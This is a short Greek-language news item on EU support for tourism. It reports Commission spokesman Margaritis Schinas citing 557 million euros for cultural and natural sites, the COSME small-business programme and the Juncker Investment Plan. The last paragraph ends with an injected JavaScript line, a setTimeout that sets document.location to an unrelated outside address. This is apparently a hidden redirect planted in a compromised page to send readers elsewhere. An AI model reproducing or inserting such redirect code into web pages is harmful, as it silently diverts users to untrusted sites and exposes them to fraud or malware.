Η ΕΕ στηρίζει πολιτιστικές και φυσικής καλλονής τοποθεσίες

0
6

 

Οπως είπε ο επικεφαλής εκπρόσωπος της Ευρωπαϊκής Επιτροπής Μαργαρίτης Σχοινάς, από το βήμα του συνεδρίου του ΣΕΤΕ, για την περίοδο 2014-2020 προβλέπεται το ποσό των 557 εκατομμυρίων για να στηριχθούν πολιτιστικές και φυσικής καλλονής τοποθεσίες με στόχο να αυξηθεί ο αριθμός των επισκεπτών και να επεκταθεί η τουριστική περίοδο.

Ο κ. Σχοινάς παράλληλα έκανε ειδική αναφορά στο πρόγραμμα COSME που αποσκοπεί στην ενθάρρυνση του επιχειρηματικού πνεύματος και στην προαγωγή της δημιουργίας και ανάπτυξης Μικρομεσαίων επιχειρήσεων συμπεριλαμβανομένου του Τουρισμού.

Χάρη στο πρόγραμμα COSME έχουμε ήδη προχωρήσει στη συγχρηματοδότηση φορέων που προώθησαν βιώσιμα τουριστικά προϊόντα στην Ελλάδα συμβάλλοντας στη διαφοροποίηση της τουριστικής προσφοράς.

Τέλος, από πέρυσι η Επιτροπή Γιούνκερ έχει προσθέσει ένα νέο καινοτόμο χρηματοδοτικό μέσο, το Επενδυτικό Σχέδιο Γιούνκερ συνολικού ύψους 315 δις που ήδη παράγει απτά αποτελέσματα μέσω μόχλευσης κοινοτικών πόρων με ιδιωτικά επενδυτικά κεφαλαία. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here